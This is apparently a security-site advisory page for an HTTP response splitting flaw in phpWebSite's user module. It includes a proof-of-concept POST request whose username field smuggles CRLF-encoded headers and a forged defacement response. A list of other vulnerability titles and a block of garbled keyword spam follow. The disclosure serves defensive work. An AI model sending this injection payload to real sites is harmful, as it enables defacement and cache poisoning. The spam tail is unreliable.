exploits , vulnerabilities , articles , PHPWebSite User Module HTTP Response Splitting Vulnerability

Title	PHPWebSite User Module HTTP Response Splitting Vulnerability
Published	2004-11-04-12:00AM
Updated	2004-11-26-08:24PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of this issue is credited to "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>.
Vulnerable	phpWebsite phpWebsite 0.9.3 4 phpWebsite phpWebsite 0.9.3 3 phpWebsite phpWebsite 0.9.3 2 phpWebsite phpWebsite 0.9.3 1 phpWebsite phpWebsite 0.9.3 phpWebsite phpWebsite 0.8.3 phpWebsite phpWebsite 0.8.2 phpWebsite phpWebsite 0.7.3 Gentoo Linux
Not Vulnerable
Code	No exploit is required to leverage this issue. The following proof of concept has been provided: POST /index.php HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-length: 218 Connection: Keep-Alive http://www.example.com/module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>This site in 0wned{/html}&password=foobar
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 02:29:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.czesxx otk news for c domain:www confixx+we skadate Sexarap sex in bed Www.Peerbo www.ftvg t659t modules/cj php-nuke 2 www.17wav. CMS is Fre VIDEOW www.gzpf16 www.hswkzy xbox 360 d technote www.880z.c News Searc Powered b news for c 333yu.cn tecent ash nacked sex ocean. www phoner www.mc321. php-nuke 2 200 /compo Lesbi sexscandal ...t/comp HP LaserJe /search/ex t995t sex p9ictu maxcpm.inf 41.225.135 WWW TAMIL apache 1.0 IMAJ PluggedOut SEX ASS www.12cr1m 200 /compo www.enter. Crack Data